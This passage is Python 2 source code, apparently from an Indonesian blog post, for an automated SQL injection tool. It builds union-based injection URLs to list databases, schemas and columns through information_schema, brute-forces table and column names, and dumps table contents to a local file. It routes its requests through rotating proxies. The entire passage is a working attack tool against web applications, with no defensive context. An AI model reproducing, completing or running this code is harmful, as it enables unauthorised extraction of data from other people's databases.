count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end
arg_row = "Columns"
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
print "[+] and Column(s) "+str(arg_columns)
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
file.write("\n[+] Column(s) "+str(arg_columns))
for column in arg_columns:
cendol += column+",0x1e,"
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end
line_URL = site.replace("cendol",cendol+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
if int(version) == 4:
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
line_URL = site.replace("cendol",cendol+"0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+arg_table
elif mode == "--masuk":
print "[+] Mulai masuk ke dalam database situs"
line_URL = site.replace("cendol","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex")
elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end
line_URL = site.replace("cendol","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")
arg_row = "Databases"
line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end
#Uncomment the lines below to debug issues with the line_URL or count_URL
#print "URL for Counting rows in column:",count_URL
#print "URL for exploit:",line_URL
#Fuzz table dan kolom untuk versi 4
if mode == "--fuzz":
print "[+] Nama tabel yg di cari :",len(fuzz_tables)
file.write("\n[+] Nama tabel yg di cari : "+str(len(fuzz_tables)))
print "[+] Nama kolom yg di cari :",len(fuzz_columns)
file.write("\n[+] Nama kolom yg di cari : "+str(len(fuzz_columns)))
print "[+] Sedang mencari tabel dan kolom "
file.write("\n[+] Sedang mencari tabel dan kolom")
fuzz_URL = site.replace("cendol","0x"+"cendol".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
for table in fuzz_tables:
try:
proxy_num+=1
table_URL = fuzz_URL.replace("TABLE",table)
gets+=1
#print "[!] Table Debug:",table_URL
source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
e = re.findall("cendol", source)
if len(e) > 0:
print "\n[!] Found a table called:",table
file.write("\n\n[+] Found a table called: "+str(table))
print "\n[+] Now searching for columns inside table \""+table+"\""
file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
for column in fuzz_columns:
try:
proxy_num+=1
gets+=1
#print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
e = re.findall("cendol",source)
if len(e) > 0:
print "[!] Found a column called:",column
file.write("\n[!] Found a column called:"+column)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "[-] Done searching inside table \""+table+"\" for columns!"
file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Untuk menghitung kolom dan baris
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
match = re.findall("\x1e\x1e\S+",source)
match = match[0][2:].split("\x1e")
row_value = match[0]
print "[+] Number of "+arg_row+": "+row_value
file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
if mode == "--schema" or mode == "--masuk" or mode == "--dbs":
##Untuk pengeksekusian terakhir
if mode == "--schema" or mode == "--dump" or mode == "--dbs":
while int(table_num) != int(row_value)+1:
#print "table#:",table_num,"row#:",row_value
try:
proxy_num+=1
gets+=1
#print line_URL
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
if mode == "--schema" or mode == "--masuk":
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n[Database]: "+match[0]+"\n")
print "[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
#Gathering Databases only
elif mode == "--dbs":
match = match[0]
file.write("\n["+str(num)+"]"+str(match))
print "["+str(num)+"]",match
table_num = int(table_num) + 1
#Collect data from tables & columns
elif mode == "--dump":
match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
match = match[0].strip("\x1e").split("\x1e")
if arg_verbose == 1:
print "\n["+str(num)+"] ",
file.write("\n["+str(num)+"] ",)
else:
file.write("\n")
for ddata in match:
if ddata == "":
ddata = "NoDataInColumn"
sys.stdout.write("%s:" % (ddata))
file.write("%s:" % ddata)
sys.stdout.flush()
table_num = int(table_num) + 1
else:
if mode == "--dump":
sys.stdout.write("\n[%s] No data" % (num))
file.write("%s:" % ddata)
table_num = int(table_num) + 1
else:
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Melihat isi dalam database
if mode == "--masuk":
while 1:
try:
proxy_num+=1
gets+=1
source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
if cur_db != match[0]:
cur_db = match[0]
file.write("\n\n[Database]: "+match[0]+"\n")
print "\n\n[Database]: "+match[0]
print "[Table: Columns]"
file.write("[Table: Columns]")
table_num=0
if cur_table != match[1]:
print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
cur_table = match[1]
table_num = int(table_num) + 1
else:
sys.stdout.write(",%s" % (match[2]))
file.write(","+match[2])
sys.stdout.flush()
else:
if num == 0:
print "\n[-] No Data Found"
break
num = int(num) + 1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Jika sudah selesai mengeksekusi
if mode == "--schema" or mode == "--masuk" or mode == "--dump":
print ""
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] selesai\n"
file.write("\n[-] selesai\n")
print "Untuk melihat hasilnya buka folder python dan lihat ada bacaan", dbt,"\n"
file.close()
0 coment:
Posting Komentar